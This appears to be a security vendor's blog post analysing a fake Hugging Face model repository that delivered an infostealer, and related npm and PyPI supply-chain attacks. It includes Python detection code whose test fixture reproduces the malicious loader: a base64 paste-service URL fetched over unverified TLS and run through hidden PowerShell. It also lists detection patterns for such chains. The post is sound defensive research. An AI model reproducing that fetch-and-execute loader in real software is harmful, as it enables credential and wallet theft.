244,000 Downloads in 18 Hours: The Model Repository Is the New Attack Surface


SPR{K3 Security Research · May 2026


https://thehackernews.com/2026/05/fake-openai-privacy-filter-repo-hits-1.html

[Figure: flowchart of the fileless loader pulling a PowerShell script from a malicious JSON payload via Base64 decoding]

On May 7, a repository called Open-OSS/privacy-filter hit the #1 trending spot on Hugging Face. It had 244,000 downloads and 667 likes. It was a near-verbatim copy of OpenAI’s legitimate Privacy Filter release — the open-weight PII redaction model published under Apache 2.0 in late April.

It was also a six-stage infostealer.

HiddenLayer identified it, Hugging Face pulled it, and the security community published the IOCs. But the incident is not about one bad repository. It is about a structural gap in how the AI ecosystem handles trust — and it connects to a broader campaign that spans HuggingFace, npm, and PyPI simultaneously.


The Attack Chain

The repository shipped a loader.py that looked legitimate — a DummyModel class, synthetic training data, realistic console output. It appeared to be a standard model loader.

Buried inside was a function called _verify_checksum_integrity(). It disabled SSL verification, decoded a base64 URL pointing to jsonkeeper.com (a public JSON paste service), fetched a JSON payload containing a PowerShell command, and executed it in a hidden window. The entire block was wrapped in a bare except so failures were silent.

The use of jsonkeeper.com as a dead drop resolver is the operational detail that matters. The attacker can rotate payloads without modifying the repository. The repo stays clean-looking while the kill chain updates dynamically.

The PowerShell command fetched a second script from a domain impersonating a blockchain analytics API, which downloaded the actual payload — a Rust-based infostealer — added it to Windows Defender’s exclusion list, and launched it at SYSTEM-level privileges via a self-deleting scheduled task.

The infostealer itself was thorough: Chromium and Firefox browsers (passwords, session cookies, encryption keys), Discord tokens, cryptocurrency wallets, SSH/FTP/VPN credentials, local files, and multi-monitor screenshots. Everything compressed and exfiltrated to a C2 server. The binary included anti-analysis for VirtualBox, VMware, QEMU, and Xen, plus AMSI and ETW disabling.

The 244,000 downloads were almost certainly inflated. HiddenLayer found 504 accounts following a firstname-lastname### pattern and 153 following an adjectivenoun#### pattern. The trending rank was manufactured. But manufactured visibility is the point — it gets the repository into the feeds of developers who trust the platform’s trending signal.


The Infrastructure Overlap

This is where it stops being an isolated incident.

HiddenLayer found that the api[.]eth-fastscan[.]org domain used in the HuggingFace campaign also served a different executable that beacons to welovechinatown[.]info — a C2 server previously used in an npm typosquatting campaign. A malicious npm package called trevlo delivered ValleyRAT (Winos 4.0), a post-exploitation framework previously distributed exclusively through fake gaming utilities targeting Chinese and Vietnamese-speaking users.

The npm delivery was a first. It marked an expansion from consumer-targeted malware into developer-targeted supply chain operations. The welovechinatown[.]info domain was registered April 21, less than 18 hours before trevlo@4.0.0 was published to npm.

HiddenLayer also identified six additional Hugging Face repositories under a separate account using identical loader logic and shared infrastructure, plus links to fake AI packages on PyPI.

Same infrastructure. Multiple ecosystems. Coordinated timing.


The Broader May 2026 Supply Chain Landscape

The HuggingFace incident didn’t happen in isolation. May 2026 has been one of the most active months for developer supply chain attacks on record.

March 31: The axios npm package — 100 million weekly downloads — was backdoored via a hijacked maintainer account. Two malicious versions were live for approximately three hours, deploying a cross-platform RAT.

April 22: TeamPCP published a malicious @bitwarden/cli package on npm as part of the Shai-Hulud campaign, targeting developer credential chains.

April 29: Mini Shai-Hulud hit SAP’s CAP Model ecosystem — four compromised packages with approximately 570,000 combined weekly downloads.

May 7: The HuggingFace Open-OSS/privacy-filter incident.

May 12: 84 malicious TanStack packages published in six minutes via GitHub Actions cache poisoning, with triple-redundant exfiltration through a typosquat domain, the Session messenger network, and GitHub API dead drops using stolen tokens.

The pattern is clear: attackers are treating developer workflow infrastructure — package registries, model repositories, CI/CD pipelines — as the primary attack surface, not an ancillary one.


What This Means for ML Infrastructure

The attack vector was not the model weights. It was loader.py, start.bat, and the README that told developers to clone and run. The model card is the social engineering. The setup script is the payload.

Our static scanner detects this class of attack: malicious instructions embedded in repository artifacts that trick developers into executing payloads. After this incident, we extended coverage to loader scripts directly — base64-to-exec chains, network fetch paired with subprocess calls, paste service C2 connections, hidden PowerShell invocations. Against a synthetic reproduction of the Open-OSS/privacy-filter payload, the scanner produces five CRITICAL findings before anyone runs anything.
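To make the loader-script checks concrete, here is an added example of a minimal AST-based scanner for the indicator combination described above. It is illustrative code written for this post, not SPR{K3’s scanner, and it is run against a constructed, inert sample shaped like the loader (the dead-drop URL is a placeholder and nothing in the sample is ever executed).

```python
import ast
import base64

# Assumption: hosts treated as paste-service dead drops (jsonkeeper.com is the one in the incident).
PASTE_HOSTS = ("jsonkeeper.com",)

def _strings(tree):
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            yield node.value.lower()
            try:  # the dead-drop URL in the incident was base64-encoded, so inspect decoded literals too
                yield base64.b64decode(node.value, validate=True).decode("ascii").lower()
            except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueError subclasses
                pass

def scan_loader(source: str) -> list[str]:
    """Return the CRITICAL findings for one Python loader script."""
    tree = ast.parse(source)
    calls = {ast.unparse(n.func) for n in ast.walk(tree) if isinstance(n, ast.Call)}
    kwargs = {ast.unparse(k) for n in ast.walk(tree) if isinstance(n, ast.Call) for k in n.keywords}
    strings = list(_strings(tree))
    findings = []
    if "ssl._create_unverified_context" in calls or "verify=False" in kwargs:
        findings.append("CRITICAL: TLS certificate verification disabled")
    if "base64.b64decode" in calls and any(h in s for s in strings for h in PASTE_HOSTS):
        findings.append("CRITICAL: base64-encoded paste-service URL (dead-drop resolver)")
    fetches = {c for c in calls if c.endswith(("urlopen", "requests.get", "requests.post"))}
    execs = {c for c in calls if c.startswith(("subprocess.", "os.system", "os.popen"))}
    if fetches and execs:
        findings.append("CRITICAL: network fetch paired with subprocess/os execution")
    if any("powershell" in s for s in strings) and any("hidden" in s or "create_no_window" in s for s in strings):
        findings.append("CRITICAL: PowerShell invoked with a hidden window")
    if any(isinstance(n, ast.ExceptHandler) and n.type is None for n in ast.walk(tree)):
        findings.append("CRITICAL: bare except makes chain failures silent")
    return findings

# Constructed, inert sample shaped like the loader described above; the dead-drop URL is a placeholder.
_URL_B64 = base64.b64encode(b"https://jsonkeeper.com/b/PLACEHOLDER").decode()
SAMPLE_LOADER = f'''
import base64, ssl, subprocess, urllib.request
def _verify_checksum_integrity():
    try:
        ctx = ssl._create_unverified_context()
        url = base64.b64decode("{_URL_B64}").decode()
        cmd = urllib.request.urlopen(url, context=ctx).read().decode()
        subprocess.Popen(["powershell", "-WindowStyle", "Hidden", "-Command", cmd])
    except:
        pass
'''
```

Running scan_loader(SAMPLE_LOADER) yields the five CRITICAL findings; a plain grep would miss the paste-service host because it only appears base64-encoded.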

On the runtime side, Defend’s behavioral correlator models the multi-stage sequence on the process lineage. SSL disable, base64 decode, paste service fetch, and hidden PowerShell each accumulate charge. In simulation, the correlator fires CRITICAL at stage four — when PowerShell spawns with a hidden window — before the Rust binary is written to disk. A separate rule catches the final stage independently: payload written, then payload executed.
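The charge-accumulation idea, as an added example that is not Defend’s correlator: events are replayed in order, each recognised stage adds charge to the whole process lineage, and a second, independent rule watches for a payload written and then executed by the same lineage. The per-stage charges, the threshold, and the event stream are constructed for illustration.

```python
from dataclasses import dataclass
@dataclass
class Event:
    pid: int
    parent: int = 0      # pid of the spawning process; 0 marks a lineage root (the loader itself)
    kind: str = ""       # tls_verify_disabled | b64_decode | net_fetch | proc_spawn | file_write | proc_exec
    detail: str = ""     # URL, command line or file path, depending on kind

# Assumption: per-stage charge and the CRITICAL threshold are illustrative, not Defend's real tuning.
STAGE_CHARGE = {"tls_verify_disabled": 1, "b64_decode": 1, "paste_fetch": 2, "hidden_powershell": 3}
CRITICAL_AT, PASTE_HOSTS = 7, ("jsonkeeper.com",)

def stage_of(ev):  # map a raw event to a named stage of the loader chain, or None
    d = ev.detail.lower()
    if ev.kind == "net_fetch" and any(h in d for h in PASTE_HOSTS):
        return "paste_fetch"
    if ev.kind == "proc_spawn" and "powershell" in d and "hidden" in d:
        return "hidden_powershell"
    return ev.kind if ev.kind in STAGE_CHARGE else None

def correlate(events):  # returns (event index, alert) pairs in the order the rules fire
    parent, charge, written, alerts, fired = {}, {}, {}, [], set()
    def root(pid):  # walk the lineage up to the original loader process
        while pid in parent:
            pid = parent[pid]
        return pid
    for i, ev in enumerate(events):
        if ev.parent:
            parent.setdefault(ev.pid, ev.parent)
        r, stage = root(ev.pid), stage_of(ev)
        if stage:  # each stage of the chain adds charge to the whole lineage
            charge[r] = charge.get(r, 0) + STAGE_CHARGE[stage]
            if charge[r] >= CRITICAL_AT and r not in fired:
                fired.add(r)
                alerts.append((i, f"CRITICAL: loader chain on lineage {r} reached stage {stage}"))
        if ev.kind == "file_write":  # independent rule: payload written, then payload executed
            written.setdefault(r, set()).add(ev.detail)
        elif ev.kind == "proc_exec" and ev.detail in written.get(r, ()):
            alerts.append((i, f"CRITICAL: lineage {r} executed the payload it wrote: {ev.detail}"))
    return alerts

# Constructed event stream modelled on the chain described above (placeholder host and path).
SAMPLE_EVENTS = [
    Event(100, 0, "tls_verify_disabled"),
    Event(100, 0, "b64_decode"),
    Event(100, 0, "net_fetch", "https://jsonkeeper.com/b/PLACEHOLDER"),
    Event(200, 100, "proc_spawn", "powershell.exe -WindowStyle Hidden -Command ..."),
    Event(200, 100, "file_write", r"C:\Users\dev\AppData\Local\Temp\PLACEHOLDER.exe"),
    Event(300, 200, "proc_exec", r"C:\Users\dev\AppData\Local\Temp\PLACEHOLDER.exe"),
]
```

With these weights the lineage crosses the threshold on the fourth event (the hidden PowerShell spawn), before any file is written, and the write-then-execute rule fires separately on the last event.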

No scanner catches the full picture. Ours detects the dropper chain inside the repo and the runtime attack sequence on the endpoint. What it doesn’t see — and no product on the market sees — is the shared C2 infrastructure linking this repo to the npm trevlo campaign and the six sibling repositories. That connection came from threat intel research, not automated tooling. Closing that gap is a cross-registry correlation problem, and it’s on the roadmap.

https://defend.sprk3.com


Operational Takeaways

For security teams running ML infrastructure:

Repository vetting is not optional. Verify publisher identity against the official organization. Check account age. Read the loader scripts before executing anything. The model card being identical to the real one is the tell, not the assurance.

Trending rank is not trust. The HuggingFace trending algorithm was gamed with automated accounts. Popularity metrics on any open registry are an attack surface, not a security signal.

Isolate model evaluation. Never clone and execute model repository code on a development workstation with access to credentials, wallets, or SSH keys. Use a disposable VM or container with no persistent state.

Monitor for infrastructure overlap. The connection between the HuggingFace and npm campaigns was found through shared C2 infrastructure. If your threat intel pipeline doesn’t correlate across model registries, package managers, and CI/CD systems simultaneously, you’re seeing fragments of coordinated campaigns and treating them as isolated incidents.

The model delivery pipeline is the attack surface. Not the model. Not the weights. The scripts, configs, and instructions that surround the model. This is the layer that needs continuous monitoring — and it’s the layer that traditional AI red teaming tools don’t reach.


SPR{K3 Security Research discovers and discloses vulnerabilities in ML/AI infrastructure. Defend’s runtime agent monitors process execution chains in ML environments; the static scanner detects doc-driven payload execution in repository artifacts. 12 NVIDIA CVEs confirmed across 3 security bulletins. defend.sprk3.com

Published by:


Dan D. Aridor

I hold an MBA from Columbia Business School (1994) and a BA in Economics and Business Management from Bar-Ilan University (1991). Previously, I served as a Lieutenant Colonel (reserve) in the Israeli Intelligence Corps. Additionally, I have extensive experience managing various R&D projects across diverse technological fields. In 2024, I founded INGA314.com, a platform dedicated to providing professional scientific consultations and analytical insights. I am passionate about history and science fiction, and I occasionally write about these topics.
